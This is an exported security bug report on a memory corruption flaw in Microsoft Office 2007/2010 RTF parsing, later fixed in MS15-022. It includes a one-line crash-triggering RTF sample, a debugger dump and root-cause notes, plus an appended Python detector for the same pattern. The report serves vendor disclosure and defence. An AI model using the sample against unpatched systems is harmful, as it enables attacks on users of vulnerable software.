v4ng3l1s / google-security-research

Automatically exported from code.google.com/p/google-security-research

Microsoft Office 2007/2010 RTF callout drawing primitive memory corruption #226

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
The following RTF file was found to crash Microsoft Office (2007 and 2010):

{\rtf1{\dpgroup\dpcallout\dppolyline\dppolyline\dppolycount2\dptxbx\dptxbx}}

Crash:

(91c.7d0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=118bb130 ebx=11122fec ecx=00000005 edx=00000000 esi=118bb11c edi=11123000
eip=7814537a esp=0011e10c ebp=0011e114 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
MSVCR80!memmove+0x5a:
7814537a f3a5            rep  movsd ds:118bb11c=00000000 es:11123000=????????
0:000> k
ChildEBP RetAddr
0011e114 3124734c MSVCR80!memmove+0x5a
WARNING: Stack unwind information not available. Following frames may be wrong.
0011e130 31809217 wwlib!FMain+0x2d9d
0011e1ac 31809083 wwlib!wdCommandDispatch+0x1494e4
001204e8 320b2d09 wwlib!wdCommandDispatch+0x149350
00120838 31ef4ea7 wwlib!DllGetClassObject+0xce460
00120a88 31c6c847 wwlib!DllCanUnloadNow+0x35c6de
00120ccc 31bbd3f0 wwlib!DllCanUnloadNow+0xd407e
00122398 31271cd4 wwlib!DllCanUnloadNow+0x24c27
00122a68 3129ef3b wwlib!FMain+0x2d725
00123b68 3129e372 wwlib!FMain+0x5a98c
00123bac 31491319 wwlib!FMain+0x59dc3
00126d28 3149103a wwlib!DllGetLCID+0x10773
0012b14c 31490ca7 wwlib!DllGetLCID+0x10494
0012b19c 31490b52 wwlib!DllGetLCID+0x10101
0012e2f8 314909d6 wwlib!DllGetLCID+0xffac
0012e31c 313165d8 wwlib!DllGetLCID+0xfe30
0012f580 313409cb wwlib!FMain+0xd2029
0012f630 31340893 wwlib!FMain+0xfc41c
0012f648 32812493 wwlib!FMain+0xfc2e4
0012f668 32812431 mso!Ordinal6541+0x327

Notes:

- The original sample crashed inconsistently (often upon application 
termination), so subsequent testing was performed with “application 
verifier” enabled. Reliable reproduction with the minimized sample is only 
possible with page heap enabled.

- The crash reproduces on Windows Server 2003 (Office 2007) and Windows 7 
(Office 2010). It does not appear to reproduce on Windows 8.1 (Office 2013).

- The crash occurs due to a memmove with an out-of-bounds destination buffer. 
It occurs on a second iteration of the function at 318090CA (wwlib.dll 
12.0.6713.5000) - the first call copies 50 bytes to a 50-byte buffer, and then 
the second call attempts to copy 40 bytes into space contiguous to this buffer.

- It appears to be a memory corruption problem caused by callout drawing 
primitives with multiple polylines followed by a count of drawing primitives 
greater than 1 and multiple text boxes.

- The function at 318090CA in wwlib.dll 12.0.6713.5000 (Office 2007) matches 
the function at 1089B15D in wwlib.dll 15.0.4675.1000 (Office 2013). Both 
functions appear to be structurally similar, indicating that this code path has 
not been rewritten between major releases. This may suggest that this issue has 
been discovered and resolved by Microsoft internally without backporting to 
previous security-supported releases, or that refactoring in another part of 
the code base has affected the ability to trigger this flaw.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by haw...@google.com on 10 Jan 2015 at 12:11
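As an added triage aid, not part of the original report or of Office itself, the Python helper below walks an RTF token stream and flags drawing groups showing the combination the notes above describe: a callout with two or more polylines, a \dppolycount greater than 1 and two or more text boxes. The sample strings are a constructed copy of the report's sample and a constructed benign variant; the thresholds are an assumption drawn from the notes, not a vendor signature.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# RTF control word: backslash, letters, optional signed numeric parameter.
CONTROL_WORD = re.compile(rb"\\([a-zA-Z]+)(-?\d+)?")
# Token stream: brace open/close, control words, or control symbols (e.g. \{, \').
TOKEN = re.compile(rb"\{|\}|\\[a-zA-Z]+-?\d*|\\.")

@dataclass
class DrawingGroupStats:
    callouts: int = 0
    polylines: int = 0
    textboxes: int = 0
    polycount: int = 0  # value of the last \dppolycountN seen in the group

def drawing_group_stats(rtf: bytes) -> list[DrawingGroupStats]:
    """Collect drawing-primitive counts for every brace group that contains
    \\dpgroup; control words in nested groups are attributed to the innermost
    enclosing drawing group."""
    results: list[DrawingGroupStats] = []
    stack: list[DrawingGroupStats | None] = []  # one entry per open brace
    for m in TOKEN.finditer(rtf):
        tok = m.group(0)
        if tok == b"{":
            stack.append(None)
        elif tok == b"}":
            if stack:
                stack.pop()
        else:
            cw = CONTROL_WORD.match(tok)
            if cw is None or not stack:  # control symbol or text outside any group
                continue
            word, param = cw.group(1), cw.group(2)
            if word == b"dpgroup":
                stack[-1] = DrawingGroupStats()
                results.append(stack[-1])
                continue
            group = next((s for s in reversed(stack) if s is not None), None)
            if group is None:
                continue
            if word == b"dpcallout":
                group.callouts += 1
            elif word == b"dppolyline":
                group.polylines += 1
            elif word == b"dptxbx":
                group.textboxes += 1
            elif word == b"dppolycount" and param:
                group.polycount = int(param)
    return results

def matches_callout_pattern(rtf: bytes) -> bool:
    """True if any drawing group shows the combination the report describes
    (assumed thresholds: callout, >=2 polylines, polycount > 1, >=2 text boxes)."""
    return any(g.callouts >= 1 and g.polylines >= 2 and g.polycount > 1
               and g.textboxes >= 2 for g in drawing_group_stats(rtf))

# Constructed inputs: a copy of the report's sample and a benign single-primitive variant.
SAMPLE_RTF = rb"{\rtf1{\dpgroup\dpcallout\dppolyline\dppolyline\dppolycount2\dptxbx\dptxbx}}"
BENIGN_RTF = rb"{\rtf1{\dpgroup\dpcallout\dppolyline\dppolycount1\dptxbx}}"
```

Run it over a directory of RTF attachments to shortlist files for sandbox detonation; a match is a reason to look, not proof of exploitation.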

GoogleCodeExporter commented 9 years ago
This issue was resolved in MS15-022.

Original comment by haw...@google.com on 25 Mar 2015 at 12:47

GoogleCodeExporter commented 9 years ago
Note that according to Microsoft this issue did affect Office 2010 and Office 
2013 - which makes sense given that we couldn't isolate any significant code 
changes between 2007 and 2013, despite not getting a reproducible crash.

Original comment by haw...@google.com on 25 Mar 2015 at 12:54